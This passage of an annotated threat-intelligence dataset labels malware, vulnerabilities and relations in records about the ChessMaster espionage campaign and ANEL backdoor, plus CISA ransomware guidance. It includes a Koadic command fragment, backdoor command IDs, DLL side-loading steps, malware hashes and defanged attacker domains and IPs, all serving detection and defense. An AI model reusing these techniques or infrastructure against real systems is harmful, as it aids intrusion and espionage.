Japan.","entities":[{"id":49628,"label":"campaign","start_offset":22,"end_offset":33},{"id":49629,"label":"identity","start_offset":71,"end_offset":111},{"id":49630,"label":"location","start_offset":115,"end_offset":120}],"relations":[{"id":851,"from_id":49628,"to_id":49629,"type":"targets"},{"id":852,"from_id":49629,"to_id":49630,"type":"located-at"}],"Comments":[]} -{"id":3789,"text":"The threat group used a variety of attack tools and techniques to spy on their target organizations.","entities":[],"relations":[],"Comments":[]} -{"id":3790,"text":" Back then, we noted that ChessMaster's sophisticated nature implied that the campaign could evolve, before finding changes in the tools and tactics used in the campaign a few months later.","entities":[{"id":49631,"label":"campaign","start_offset":26,"end_offset":37}],"relations":[],"Comments":[]} -{"id":3791,"text":" While the original campaign was comprehensive and used remote access Trojans (RATs) such as ChChes and RedLeaves, this new campaign used a new backdoor (Detected by Trend Micro as BKDR_ANEL.ZKEI) that leverages the CVE-2017-8759 vulnerability for its cyberespionage activities.","entities":[{"id":49632,"label":"malware","start_offset":93,"end_offset":99},{"id":49633,"label":"malware","start_offset":104,"end_offset":113},{"id":49634,"label":"malware","start_offset":181,"end_offset":195},{"id":49636,"label":"identity","start_offset":166,"end_offset":177},{"id":49635,"label":"vulnerability","start_offset":216,"end_offset":229}],"relations":[{"id":853,"from_id":49634,"to_id":49635,"type":"exploits"}],"Comments":[]} -{"id":3792,"text":"In this blog post, we analyze ChessMaster's current status, including the updated tools in its arsenal — with a particular focus on the evolution of ANEL and how it is used in the campaign.","entities":[{"id":49638,"label":"malware","start_offset":149,"end_offset":153},{"id":49637,"label":"campaign","start_offset":30,"end_offset":41}],"relations":[],"Comments":[]} -{"id":3793,"text":" July ChessMaster Campaign November ChessMaster Campaign Current ChessMaster Campaign","entities":[{"id":49639,"label":"campaign","start_offset":8,"end_offset":19},{"id":49642,"label":"campaign","start_offset":38,"end_offset":49},{"id":49643,"label":"campaign","start_offset":67,"end_offset":78},{"id":49640,"label":"TIME","start_offset":3,"end_offset":7},{"id":49641,"label":"TIME","start_offset":29,"end_offset":37}],"relations":[],"Comments":[]} -{"id":3794,"text":" Point of Entry Spear-phishing emails containing decoy documents Malicious shortcut (LNK) files and PowerShell Self-extracting archive (SFX) Runtime packers Spear-phishing emails containing decoy documents exploiting CVE-2017-8759 Spear-phishing emails containing decoy documents exploiting CVE-2017-11882, DDEAUTO, Microsoft Office Frameset and Link auto update Notable Tools Hacking Tools Second-stage payloads Koadic Hacking Tools Second-stage payloads Koadic Hacking Tools Second-stage payloads Backdoor ChChes ANEL ANEL Technical Analysis Figure 1.","entities":[{"id":49644,"label":"attack-pattern","start_offset":17,"end_offset":31},{"id":49645,"label":"attack-pattern","start_offset":50,"end_offset":65},{"id":49650,"label":"attack-pattern","start_offset":238,"end_offset":252},{"id":49647,"label":"attack-pattern","start_offset":101,"end_offset":157},{"id":49648,"label":"attack-pattern","start_offset":161,"end_offset":175},{"id":49649,"label":"vulnerability","start_offset":221,"end_offset":234},{"id":49651,"label":"vulnerability","start_offset":299,"end_offset":313},{"id":49652,"label":"attack-pattern","start_offset":271,"end_offset":286},{"id":49654,"label":"malware","start_offset":473,"end_offset":479},{"id":49655,"label":"malware","start_offset":528,"end_offset":534},{"id":49656,"label":"malware","start_offset":538,"end_offset":542},{"id":49657,"label":"malware","start_offset":546,"end_offset":550},{"id":49653,"label":"malware","start_offset":427,"end_offset":433}],"relations":[],"Comments":[]} -{"id":3795,"text":"Infection Chain for the current ChessMaster campaign","entities":[{"id":49658,"label":"malware","start_offset":32,"end_offset":43}],"relations":[],"Comments":[]} -{"id":3796,"text":"ChessMaster’s current iteration starts off with the familiar phishing attacks seen in the earlier campaigns that involved the use of an email with an attached malicious document using the doc, docx, rtf, csv and msg formats.","entities":[{"id":49659,"label":"malware","start_offset":0,"end_offset":11},{"id":49660,"label":"attack-pattern","start_offset":61,"end_offset":77}],"relations":[],"Comments":[]} -{"id":3797,"text":"The email title and attached file name were written in Japanese and contain general business, political, and economy-themed phrases such as 世界経済(World economy) 経済政策(economic policy) 予算概算要求(budget estimation request) 日米対話(Japan-US dialogue) 安倍再任(re-appointment of Prime Minister Abe) 連絡網(contact network) 職員採用案(staff recruitment plan) 会議(meeting) However, there is a change in the exploit document.","entities":[],"relations":[],"Comments":[]} -{"id":3798,"text":"When we tracked ChessMaster back in November, we noted that it exploited the SOAP WSDL parser vulnerability CVE-2017-8759 (patched in September 2017) within the Microsoft .NET framework to download additional malware.","entities":[{"id":49661,"label":"malware","start_offset":16,"end_offset":27},{"id":49664,"label":"TIME","start_offset":134,"end_offset":148},{"id":49666,"label":"vulnerability","start_offset":77,"end_offset":121},{"id":49662,"label":"TIME","start_offset":36,"end_offset":44},{"id":49667,"label":"SOFTWARE","start_offset":161,"end_offset":185}],"relations":[{"id":854,"from_id":49661,"to_id":49666,"type":"exploits"},{"id":855,"from_id":49667,"to_id":49666,"type":"has"}],"Comments":[]} -{"id":3799,"text":"While ChessMaster still uses the previous exploit, it also added more methods to its arsenal: one exploits another vulnerability, CVE-2017-11882 (patched in November 2017), which was also exploited to deliver illegal versions of the Loki infostealer.","entities":[{"id":49668,"label":"malware","start_offset":233,"end_offset":249},{"id":49669,"label":"TIME","start_offset":157,"end_offset":170},{"id":49670,"label":"vulnerability","start_offset":130,"end_offset":144},{"id":49671,"label":"malware","start_offset":6,"end_offset":17}],"relations":[{"id":856,"from_id":49671,"to_id":49670,"type":"exploits"},{"id":857,"from_id":49670,"to_id":49668,"type":"drops"}],"Comments":[]} -{"id":3800,"text":"Figure 2. Exploitation of CVE-2017-11882","entities":[{"id":49672,"label":"vulnerability","start_offset":26,"end_offset":40}],"relations":[],"Comments":[]} -{"id":3801,"text":"It also abuses three legitimate MS Office functions:","entities":[{"id":49673,"label":"SOFTWARE","start_offset":32,"end_offset":41}],"relations":[],"Comments":[]} -{"id":3802,"text":"Function Purpose Affected MS Office Formats we found in the wild Automatic Dynamic Data Exchange (DDEAUTO) A legitimate Microsoft Office function used in an Office file to retrieve data from another Office file","entities":[{"id":49675,"label":"SOFTWARE","start_offset":120,"end_offset":136},{"id":49674,"label":"SOFTWARE","start_offset":26,"end_offset":35},{"id":49677,"label":"SOFTWARE","start_offset":199,"end_offset":205},{"id":49676,"label":"SOFTWARE","start_offset":157,"end_offset":163}],"relations":[],"Comments":[]} -{"id":3803,"text":".doc .rtf .msg Link","entities":[],"relations":[],"Comments":[]} -{"id":3804,"text":"Auto Update","entities":[],"relations":[],"Comments":[]} -{"id":3805,"text":"An Office function used for automatic and user-free updates for embedded links upon opening.","entities":[{"id":49678,"label":"SOFTWARE","start_offset":3,"end_offset":9}],"relations":[],"Comments":[]} -{"id":3806,"text":" .csv Microsoft Word's \"Frames\/Frameset\" A feature that allows HTML or Text pages to be loaded in a frame within Microsoft Word.","entities":[{"id":49679,"label":"SOFTWARE","start_offset":8,"end_offset":22},{"id":49680,"label":"SOFTWARE","start_offset":115,"end_offset":129}],"relations":[],"Comments":[]} -{"id":3807,"text":" .docx Figure 3. Exploitation of DDEAUTO Figure 4.","entities":[],"relations":[],"Comments":[]} -{"id":3808,"text":"Abusing Microsoft Word's \"Frames\/Frameset\"","entities":[{"id":49681,"label":"SOFTWARE","start_offset":8,"end_offset":22}],"relations":[],"Comments":[]} -{"id":3809,"text":" Figure 5. Exploitation of Link Auto Update","entities":[],"relations":[],"Comments":[]} -{"id":3810,"text":"ChessMaster can utilize any of these methods to download the next malware in the chain, the open source post-exploitation tool known as “Koadic,” which the previous campaign also used.","entities":[{"id":49682,"label":"malware","start_offset":0,"end_offset":11},{"id":49683,"label":"malware","start_offset":137,"end_offset":143}],"relations":[{"id":858,"from_id":49682,"to_id":49683,"type":"downloads"}],"Comments":[]} -{"id":3811,"text":"This tool is responsible for stealing information — specifically the environment information — within the target system.","entities":[],"relations":[],"Comments":[]} -{"id":3812,"text":"Koadic executes the following command: %comspec% \/q \/c 1> 2>&1 ","entities":[{"id":49684,"label":"malware","start_offset":0,"end_offset":6}],"relations":[],"Comments":[]} -{"id":3813,"text":"The commands and output of Koadic will change according to the ANEL version used in the attack.","entities":[{"id":49686,"label":"malware","start_offset":27,"end_offset":33},{"id":49685,"label":"malware","start_offset":63,"end_offset":67}],"relations":[],"Comments":[]} -{"id":3814,"text":"The table below lists examples of the commands and outputs for ANEL versions 5.1.1 rc and 5.1.2 rc1.","entities":[{"id":49687,"label":"malware","start_offset":63,"end_offset":67}],"relations":[],"Comments":[]} -{"id":3815,"text":"Note that if ANEL 5.1.2 rc1 was downloaded, the attacker would use HTTPS to avoid the downloaded data being captured as clear text.","entities":[{"id":11587,"label":"malware","start_offset":13,"end_offset":17}],"relations":[],"Comments":[]} -{"id":3816,"text":"Figure 6.","entities":[],"relations":[],"Comments":[]} -{"id":3817,"text":"Koadic commands and output when ANEL 5.1.1 rc is used Figure 7.","entities":[{"id":11590,"label":"malware","start_offset":0,"end_offset":6},{"id":11592,"label":"malware","start_offset":32,"end_offset":36}],"relations":[],"Comments":[]} -{"id":3818,"text":"Koadic commands and output when ANEL 5.1.2 rc1 is used","entities":[{"id":11594,"label":"malware","start_offset":0,"end_offset":6},{"id":11596,"label":"malware","start_offset":32,"end_offset":36}],"relations":[],"Comments":[]} -{"id":3819,"text":"The table below lists all of Koadic's functions: {Variable}.user User-related functions {Variable}.user.isElevated Check Privilege {Variable}.user.OS Get OS Version {Variable}.user.DC","entities":[{"id":11597,"label":"malware","start_offset":29,"end_offset":35}],"relations":[],"Comments":[]} -{"id":3820,"text":"Get DCName from Registry {Variable}.user.Arch","entities":[],"relations":[],"Comments":[]} -{"id":3821,"text":"Get Architecture {Variable}.user.info Get User Information {Variable}.work","entities":[],"relations":[],"Comments":[]} -{"id":3822,"text":"Main Routine functions {Variable}.work.report Reports to server {Variable}.work.error Returns error {Variable}.work.make_url Alters\/Modifies URL (C&C) {Variable}.work.get","entities":[],"relations":[],"Comments":[]} -{"id":3823,"text":"Get the return of POST Header {Variable}.work.fork Creates rundll32.exe process {Variable}.http HTTP Connection functions {Variable}.http.create Creates initial HTTP objects {Variable}.http.post POST header {Variable}.http.addHeaders","entities":[],"relations":[],"Comments":[]} -{"id":3824,"text":"Adds HTTP Headers {Variable}.http.get GET Header {Variable}.http.upload Uploads binaries\/data {Variable}.http.bin2str String manipulation {Variable}.http.downloadEx","entities":[],"relations":[],"Comments":[]} -{"id":3825,"text":"Downloads response {Variable}.http.download Additional download function {Variable}.process Process-related functions {Variable}.process.currentPID Get Current Process ID {Variable}.process.list Enumerates Process {Variable}.process.kill Terminates Process {Variable}.registry Registry-related functions {Variable}.registry.HKCR Set HKEY_CLASSES_ROOT {","entities":[],"relations":[],"Comments":[]} -{"id":3826,"text":"Variable}.registry.HKCU Set HKEY_CURRENT_USER {Variable}.registry.HKLM Set HKEY_LOCAL_MACHINE {Variable}.registry.STRING Set String Value {Variable}.registry.BINARY Set Binary Value {Variable}.registry.DWORD Set DWORD Value {Variable}.registry.QWORD","entities":[],"relations":[],"Comments":[]} -{"id":3827,"text":"Set QWORD Value {Variable}.registry.write Write\/Add Registry {Variable}.registry.provider Create Registry Handle {Variable}.registry.destroy Deletes Registry Key {Variable}.registry.read Get\/Read Registry Entries {Variable}.WMI WMI-related functions {","entities":[],"relations":[],"Comments":[]} -{"id":3828,"text":"Variable}.WMI.createProcess Creates specified process {Variable}.shell File\/Process Execution functions {Variable}.shell.run Run commands {Variable}.shell.exec Executes process {Variable}.file File-related functions {Variable}.file.getPath Get specified file path {Variable}.file.readText Reads specified text file {Variable}.file.get32BitFolder Get System Folder (32\/64-bit) {Variable}.file.writol Writes on specified file {Variable}.file.deleteFile Deletes specified file {Variable}.file.readBinary Reads specified binary file. Figure 8.","entities":[],"relations":[],"Comments":[]} -{"id":3829,"text":"Command added when the Koadic RAT is downloaded (use of {Variable}.shell.exec command)","entities":[{"id":11613,"label":"malware","start_offset":23,"end_offset":29}],"relations":[],"Comments":[]} -{"id":3830,"text":"If Koadic finds that the system is conducive to the attacker’s interests, it downloads a base64-encrypted version of the ANEL malware from the Command-and-Control (C&C) server and executes it. Encrypted ANEL is decrypted using the “certutil -docode” command.","entities":[{"id":11615,"label":"malware","start_offset":121,"end_offset":125},{"id":11618,"label":"malware","start_offset":204,"end_offset":208},{"id":49688,"label":"malware","start_offset":3,"end_offset":9}],"relations":[{"id":859,"from_id":49688,"to_id":11615,"type":"downloads"}],"Comments":[]} -{"id":3831,"text":"When ANEL executes, a decrypted DLL file with the filename “lena_http_dll.dll” is expanded in memory.","entities":[{"id":11620,"label":"malware","start_offset":5,"end_offset":9},{"id":11621,"label":"FILEPATH","start_offset":60,"end_offset":77}],"relations":[],"Comments":[]} -{"id":3832,"text":"This file contains one export function — either “crt_main” or “lena_main” Figure 9.","entities":[],"relations":[],"Comments":[]} -{"id":3833,"text":"Base64 encoded ANEL downloaded by Koadic ANEL will send the infected environment’s information to the C&C server.","entities":[{"id":49689,"label":"malware","start_offset":15,"end_offset":19},{"id":49690,"label":"malware","start_offset":34,"end_offset":40},{"id":49691,"label":"malware","start_offset":41,"end_offset":45},{"id":49692,"label":"Infrastucture","start_offset":102,"end_offset":112}],"relations":[{"id":860,"from_id":49690,"to_id":49689,"type":"downloads"},{"id":861,"from_id":49691,"to_id":49692,"type":"exfiltrates-to"}],"Comments":[]} -{"id":3834,"text":"When sending the information, ANEL encrypts the data using blowfish, XOR, and Base64-based encryption methods.","entities":[{"id":11628,"label":"malware","start_offset":30,"end_offset":34}],"relations":[],"Comments":[]} -{"id":3835,"text":"The format ANEL uses to send data is similar to ChChes, but ANEL's encryption method is easier to use.","entities":[{"id":11630,"label":"malware","start_offset":11,"end_offset":15},{"id":11631,"label":"malware","start_offset":48,"end_offset":54},{"id":11632,"label":"malware","start_offset":60,"end_offset":64}],"relations":[],"Comments":[]} -{"id":3836,"text":"Figure 10.","entities":[],"relations":[],"Comments":[]} -{"id":3837,"text":"Encryption key using blowfish","entities":[],"relations":[],"Comments":[]} -{"id":3838,"text":"We initially discovered the malware known as ANEL back in September 2017.","entities":[{"id":11634,"label":"malware","start_offset":45,"end_offset":49},{"id":49693,"label":"TIME","start_offset":58,"end_offset":72}],"relations":[],"Comments":[]} -{"id":3839,"text":"At that time, ChessMaster was using ANEL as a backdoor into the target system then injects code into svchost.exe, which then decrypts and activates the embedded backdoor.","entities":[{"id":49694,"label":"malware","start_offset":14,"end_offset":25},{"id":49695,"label":"malware","start_offset":36,"end_offset":40},{"id":49696,"label":"FILEPATH","start_offset":101,"end_offset":112}],"relations":[],"Comments":[]} -{"id":3840,"text":"This initial version of ANEL had a hardcoded version labeled “5.0.0 beta1” that contained incomplete code.","entities":[{"id":11641,"label":"malware","start_offset":24,"end_offset":28}],"relations":[],"Comments":[]} -{"id":3841,"text":"We noted that this might signify the release of a future variant.","entities":[],"relations":[],"Comments":[]} -{"id":3842,"text":"Instead of just one new variant, we discovered four different versions of ANEL: 5.0.0 beta1 5.1.1 rc 5.1.2 rc1 5.2.0 rev1 The different versions contain changes in the ANEL loader and the main ANEL DLL.","entities":[{"id":11645,"label":"malware","start_offset":74,"end_offset":78},{"id":11648,"label":"malware","start_offset":195,"end_offset":199},{"id":11646,"label":"malware","start_offset":170,"end_offset":174}],"relations":[],"Comments":[]} -{"id":3843,"text":"The figure below shows a summary of the changes between each version: Figure 11.","entities":[],"relations":[],"Comments":[]} -{"id":3844,"text":"Summary of the changes between each version of ANEL","entities":[{"id":49697,"label":"malware","start_offset":47,"end_offset":51}],"relations":[],"Comments":[]} -{"id":3845,"text":"Differences with regards to Backdoor commands: CMD ID 5.0.0 beta1\/5.1.1 rc\/5.1.2 rc1 5.2.0 rev1 0x97A168D9697D40DD Save File 0x7CF812296CCC68D5 Upload File 0x652CB1CEFF1C0A00 NA Load New PE file 0x27595F1F74B55278 Save File and Execute If no match above Execute Command or File The differences shown in the table above are subtle but present.","entities":[],"relations":[],"Comments":[]} -{"id":3846,"text":"For example, the initial ANEL version, “5.0.0 beta1,” uses a different C&C server compared to the other versions.","entities":[{"id":11660,"label":"malware","start_offset":25,"end_offset":29}],"relations":[],"Comments":[]} -{"id":3847,"text":"Once ANEL evolved to “5.1.1 rc,” it changed its file type to an executable, while also changing the C&C server.","entities":[{"id":11661,"label":"malware","start_offset":5,"end_offset":9}],"relations":[],"Comments":[]} -{"id":3848,"text":"The third version we found (5.1.2 rc1) reverts to a DLL file type but retains the C&C server.","entities":[],"relations":[],"Comments":[]} -{"id":3849,"text":"The fourth version of ANEL (5.2.0 rev1) changes both the export function in the expanded main ANEL DLL and uses a different C&C server.","entities":[{"id":49698,"label":"malware","start_offset":22,"end_offset":39}],"relations":[],"Comments":[]} -{"id":3850,"text":"Overall, we can see subtle changes, which indicate that the threat actors behind ANEL are making incremental improvements to the malware to refine it.","entities":[{"id":49699,"label":"malware","start_offset":81,"end_offset":85}],"relations":[],"Comments":[]} -{"id":3851,"text":"Figure 12.","entities":[],"relations":[],"Comments":[]} -{"id":3852,"text":"Backdoor function differences between ANEL 5.0.0 beta1\/5.1.1 rc\/5.1.2 rc1 (left) and ANEL 5.2.0 rev1 (right)","entities":[{"id":49700,"label":"malware","start_offset":38,"end_offset":73},{"id":49701,"label":"malware","start_offset":85,"end_offset":100}],"relations":[],"Comments":[]} -{"id":3853,"text":"Once ANEL enters the user’s system, it will download various tools that could be used for malicious purposes, including password retrieval tools as well as malicious mail services and accessibility tools that will allow it to gather information about the system.","entities":[{"id":49702,"label":"malware","start_offset":5,"end_offset":9}],"relations":[],"Comments":[]} -{"id":3854,"text":"These include Getpass.exe and Mail.exe, which are password and information stealers.","entities":[{"id":49703,"label":"FILEPATH","start_offset":14,"end_offset":25},{"id":49704,"label":"FILEPATH","start_offset":30,"end_offset":38}],"relations":[],"Comments":[]} -{"id":3855,"text":"It also downloads the following: Accevent.exe <-> Microsoft Accessible Event Watcher 7.2.0.0 event.dll <-> the loader of ssssss.ddd, (Detected as TROJ_ANELLDR) ssssss.ddd (lena_http.bin) <-> encrypted BKDR_ANEL (Detected as BKDR_ANELENC) ","entities":[{"id":49708,"label":"FILEPATH","start_offset":161,"end_offset":171},{"id":49711,"label":"malware","start_offset":225,"end_offset":237},{"id":49705,"label":"FILEPATH","start_offset":34,"end_offset":46},{"id":49706,"label":"FILEPATH","start_offset":94,"end_offset":103},{"id":49707,"label":"FILEPATH","start_offset":122,"end_offset":132},{"id":49709,"label":"FILEPATH","start_offset":173,"end_offset":186},{"id":49710,"label":"malware","start_offset":202,"end_offset":211},{"id":49712,"label":"malware","start_offset":147,"end_offset":159},{"id":49713,"label":"SOFTWARE","start_offset":51,"end_offset":93}],"relations":[],"Comments":[]} -{"id":3856,"text":"These three files work together using a common technique call DLL Side-Loading or DLL Hijacking.","entities":[{"id":49714,"label":"attack-pattern","start_offset":62,"end_offset":78},{"id":49715,"label":"attack-pattern","start_offset":82,"end_offset":95}],"relations":[],"Comments":[]} -{"id":3857,"text":"In this scenario, accevent.exe is the primary executable, which is usually legitimate.","entities":[{"id":49716,"label":"FILEPATH","start_offset":18,"end_offset":30}],"relations":[],"Comments":[]} -{"id":3858,"text":"After the execution of accevent.exe, it loads event.dll, which will be placed in the same folder (so it takes loading priority), after which event.dll decrypts and loads the encrypted backdoor ssssss.ddd, which is BKDR_ANEL.","entities":[{"id":49719,"label":"FILEPATH","start_offset":141,"end_offset":150},{"id":49717,"label":"FILEPATH","start_offset":23,"end_offset":35},{"id":49718,"label":"FILEPATH","start_offset":46,"end_offset":55},{"id":49720,"label":"FILEPATH","start_offset":193,"end_offset":203},{"id":49721,"label":"malware","start_offset":214,"end_offset":223}],"relations":[{"id":862,"from_id":49717,"to_id":49718,"type":"downloads"},{"id":863,"from_id":49720,"to_id":49721,"type":"duplicate-of"}],"Comments":[]} -{"id":3859,"text":"When we analyzed ANEL 5.1.1 rc, encrypted ANEL 5.1.2 rc1 was downloaded and executed.","entities":[{"id":49722,"label":"malware","start_offset":17,"end_offset":30},{"id":49723,"label":"malware","start_offset":42,"end_offset":56}],"relations":[],"Comments":[]} -{"id":3860,"text":"Short-term mitigation","entities":[],"relations":[],"Comments":[]} -{"id":3861,"text":"When the user opens the document DDEAUTO or Link Auto Update, Office will display a message.","entities":[{"id":49724,"label":"SOFTWARE","start_offset":62,"end_offset":68}],"relations":[],"Comments":[]} -{"id":3862,"text":"If the user clicks on the “No” button, malicious activity will not initiate.","entities":[],"relations":[],"Comments":[]} -{"id":3863,"text":"Figure 13: Popup message when users open the document that abuses DDEAUTO Figure 14.","entities":[],"relations":[],"Comments":[]} -{"id":3864,"text":"Popup message when the user opens the document that abuses Link Auto Update Koadic sends its own JavaScript code as plain text.","entities":[{"id":49725,"label":"malware","start_offset":76,"end_offset":82}],"relations":[],"Comments":[]} -{"id":3865,"text":"The suspect communication allows us to detect the traffic.","entities":[],"relations":[],"Comments":[]} -{"id":3866,"text":" Figure 15. Koadic’s communication traffic Medium- to long-term mitigation","entities":[{"id":49726,"label":"malware","start_offset":12,"end_offset":18}],"relations":[],"Comments":[]} -{"id":3867,"text":"At first glance, it seems ChessMaster’s evolution over the past few months involves subtle changes.","entities":[{"id":49727,"label":"malware","start_offset":26,"end_offset":37}],"relations":[],"Comments":[]} -{"id":3868,"text":"However, the constant addition and changing of features and attack vectors indicate that the attackers behind the campaign are unlikely to stop and are constantly looking to evolve their tools and tactics.","entities":[],"relations":[],"Comments":[]} -{"id":3869,"text":" Organizations can implement various techniques and best practices to defend against targeted attacks, such as regular patching to prevent vulnerability exploitation and using tools that provide protection across different network levels.","entities":[],"relations":[],"Comments":[]} -{"id":3870,"text":"Solutions that feature behavior monitoring, application control, email gateway monitoring, and intrusion\/detection systems can help with this.","entities":[],"relations":[],"Comments":[]} -{"id":3871,"text":"Given how cybercriminal tools, tactics and procedures are evolving, organizations will have to go beyond their typical day-to-day security requirements and find a way to preempt attacks.","entities":[],"relations":[],"Comments":[]} -{"id":3872,"text":"Thus, there is a pressing need to detect and address threats via a proactive incident response strategy.","entities":[],"relations":[],"Comments":[]} -{"id":3873,"text":"Essentially, this involves creating a remediation plan for effectively combating the threat and using round-the-clock intrusion detection and threat analysis to prevent attacks from entering the system.","entities":[],"relations":[],"Comments":[]} -{"id":3874,"text":"A proactive strategy can be much more effective for targeted attacks, as these kinds of attacks are often designed to be elusive and difficult to detect, thus the need to scope them out.","entities":[],"relations":[],"Comments":[]} -{"id":3875,"text":"A comprehensive security strategy that involves proactive incident response will need the input of both decision makers and tech-savvy personnel, as they will need to be on the same page for it to be effective.","entities":[],"relations":[],"Comments":[]} -{"id":3876,"text":"In addition to implementing both mitigation techniques and proactive strategies, organizations can also strengthen their security by employing solutions such Trend Micro™ Deep Security™ and TippingPoint, which protects endpoints from threats that abuse vulnerabilities.","entities":[{"id":49728,"label":"identity","start_offset":158,"end_offset":169},{"id":49729,"label":"SOFTWARE","start_offset":171,"end_offset":184},{"id":49730,"label":"SOFTWARE","start_offset":190,"end_offset":202}],"relations":[],"Comments":[]} -{"id":3877,"text":"In addition, comprehensive security solutions can be used to protect organizations from attacks.","entities":[],"relations":[],"Comments":[]} -{"id":3878,"text":"These include Trend Micro endpoint solutions such as Trend Micro™ Smart Protection Suites and Worry-Free™ Business Security, which can protect users and businesses from these threats by detecting malicious files, well as blocking all related malicious URLs.","entities":[{"id":49731,"label":"identity","start_offset":14,"end_offset":25},{"id":49732,"label":"identity","start_offset":53,"end_offset":64},{"id":49733,"label":"SOFTWARE","start_offset":66,"end_offset":89},{"id":49734,"label":"SOFTWARE","start_offset":94,"end_offset":104},{"id":49735,"label":"SOFTWARE","start_offset":106,"end_offset":123}],"relations":[],"Comments":[]} -{"id":3879,"text":"Trend Micro Deep Discovery™ can protect enterprises by detecting malicious attachment and URLs.","entities":[{"id":49736,"label":"SOFTWARE","start_offset":0,"end_offset":26}],"relations":[],"Comments":[]} -{"id":3880,"text":"Trend Micro OfficeScan™ with XGen™ endpoint security","entities":[{"id":49737,"label":"SOFTWARE","start_offset":0,"end_offset":34}],"relations":[],"Comments":[]} -{"id":3881,"text":"infuses high-fidelity machine learning with other detection technologies and global threat intelligence for comprehensive protection against all kinds of threats.","entities":[],"relations":[],"Comments":[]} -{"id":3882,"text":"A more detailed analysis of the Command-and-Control communication flow of ANEL can be found in this technical brief.","entities":[{"id":49738,"label":"malware","start_offset":74,"end_offset":78}],"relations":[],"Comments":[]} -{"id":3883,"text":"Indicators of Compromise Hash Downloader used in the campaign: 76b1f75ee15273d1226392db3d8f1b2aed467c2875e11d9c14fd18120afc223a 4edcff56f586bd69585e0c9d1d7ff4bfb1a2dac6e2a9588f155015ececbe1275 1b5a1751960b2c08631601b07e3294e4c84dfd71896453b65a45e4396a6377cc Hashes detected as part of the BKDR_ANEL Family: 5.0.0 beta1 af1b2cd8580650d826f48ad824deef3749a7db6fde1c7e1dc115c6b0a7dfa0dd 5.1.1 rc 2371f5b63b1e44ca52ce8140840f3a8b01b7e3002f0a7f0d61aecf539566e6a1 5.1.2 rc1 05dd407018bd316090adaea0855bd7f7c72d9ce4380dd4bc0feadc6566a36170 5.2.0 rev1 00030ec8cce1f21120ebf5b90ec408b59166bbc3fba17ebae0fc23b3ca27bf4f lena_http.bin 303f9c00edb4c6082542e456a30a2446a259b8bb9fb6b0f76ff318d5905e429c Tools used in the campaign: Getpass.exe 52a8557c8cdd5d925453383934cb10a85b117522b95c6d28ca097632ac8bc10d event.dll 6c3224dbf6bbabe058b0ab46233c9d35c970aa83e8c4bdffb85d78e31159d489 mail.exe 2f76c9242d5ad2b1f941fb47c94c80c1ce647df4d2d37ca2351864286b0bb3d8 URLs and IP Addresses related to the campaign: www[.]nasnnones[.]com trems[.]rvenee[.]com contacts[.]rvenee[.]com 91[.]207[.]7[.]91 89[.]18[.]27[.]159 89[.]37[.]226[.]108 185[.]25[.]51[.]116 185[.]81[.]113[.]95 185[.]144[.]83[.]82 185[.]153[.]198[.]58 185[.]159[.]129[.]226 Tags Malware | APT & Targeted Attacks | Endpoints | Cyber Crime | Research | Network","entities":[{"id":11786,"label":"SHA2","start_offset":194,"end_offset":258},{"id":11787,"label":"SHA2","start_offset":322,"end_offset":386},{"id":11788,"label":"SHA2","start_offset":398,"end_offset":462},{"id":11790,"label":"SHA2","start_offset":553,"end_offset":617},{"id":11792,"label":"SHA2","start_offset":634,"end_offset":698},{"id":11795,"label":"SHA2","start_offset":818,"end_offset":882},{"id":11799,"label":"IPV4","start_offset":1075,"end_offset":1092},{"id":11800,"label":"IPV4","start_offset":1093,"end_offset":1111},{"id":11801,"label":"IPV4","start_offset":1112,"end_offset":1131},{"id":11802,"label":"IPV4","start_offset":1132,"end_offset":1151},{"id":11803,"label":"IPV4","start_offset":1152,"end_offset":1171},{"id":11804,"label":"IPV4","start_offset":1172,"end_offset":1191},{"id":11805,"label":"IPV4","start_offset":1192,"end_offset":1212},{"id":11806,"label":"IPV4","start_offset":1213,"end_offset":1234},{"id":11784,"label":"SHA2","start_offset":64,"end_offset":128},{"id":11785,"label":"SHA2","start_offset":129,"end_offset":193},{"id":11789,"label":"SHA2","start_offset":475,"end_offset":539},{"id":11794,"label":"SHA2","start_offset":741,"end_offset":805},{"id":11796,"label":"SHA2","start_offset":894,"end_offset":958},{"id":11791,"label":"FILEPATH","start_offset":619,"end_offset":632},{"id":49741,"label":"DOMAIN","start_offset":1051,"end_offset":1074},{"id":49742,"label":"FILEPATH","start_offset":807,"end_offset":816},{"id":49743,"label":"FILEPATH","start_offset":884,"end_offset":892},{"id":49739,"label":"DOMAIN","start_offset":1008,"end_offset":1029},{"id":49740,"label":"DOMAIN","start_offset":1030,"end_offset":1050}],"relations":[],"Comments":[]} -{"id":3884,"text":"Last June 9, 2021, the Cybersecurity and Infrastructure Security Agency (CISA) released the Rising Ransomware Threat to OT Assets, which addresses the recent rise in ransomware attacks targeting operational assets (OT) and control systems.","entities":[{"id":49744,"label":"TIME","start_offset":5,"end_offset":17},{"id":49745,"label":"identity","start_offset":23,"end_offset":78}],"relations":[],"Comments":[]} -{"id":3885,"text":"The guidance provides steps to prepare for, mitigate against, and respond to attacks.","entities":[],"relations":[],"Comments":[]} -{"id":3886,"text":"It also identifies how dependencies between an enterprise's IT and OT systems can give attackers a path.","entities":[],"relations":[],"Comments":[]} -{"id":3887,"text":"Lastly, the document thoroughly explains how to decrease the risk of severe business degradation if affected by a ransomware attack.","entities":[],"relations":[],"Comments":[]} -{"id":3888,"text":"To prepare for ransomware attacks, CISA recommends enterprises determine their critical operational processes' reliance on key IT infrastructure and identify a resilience plan for when access control is lost.","entities":[{"id":49746,"label":"identity","start_offset":35,"end_offset":39}],"relations":[],"Comments":[]} -{"id":3889,"text":"They should also exercise an incident response plan and Implement regular data backup procedures on both IT and OT networks.","entities":[],"relations":[],"Comments":[]} -{"id":3890,"text":"For mitigating and responding to an attack, organizations must practice good cyber hygiene by updating software, implementing an allow listing, and enabling strong spam filters.","entities":[],"relations":[],"Comments":[]} -{"id":3891,"text":"Organizations must also identify which systems were affected and immediately isolate them and triage the impacted systems for restorations and recovery.","entities":[],"relations":[],"Comments":[]} -{"id":3892,"text":"They must also confer with teams to develop and document what has occurred.","entities":[],"relations":[],"Comments":[]} -{"id":3893,"text":"According to the agency, critical infrastructure owners and operators should also adopt an \"heightened state of awareness\".","entities":[],"relations":[],"Comments":[]} -{"id":3894,"text":"CISA also encourages them to identify critical processes that must not be interrupted to provide essential services, develop and regularly test workarounds and\/or manual controls that ensure critical processes and industrial control system (ICS) network supporting them.","entities":[{"id":49747,"label":"identity","start_offset":0,"end_offset":4}],"relations":[],"Comments":[]} -{"id":3895,"text":"CISA recommends critical infrastructure owners to implement robust network segmentation between IT and OT networks and make sure backup procedures are executed and tested 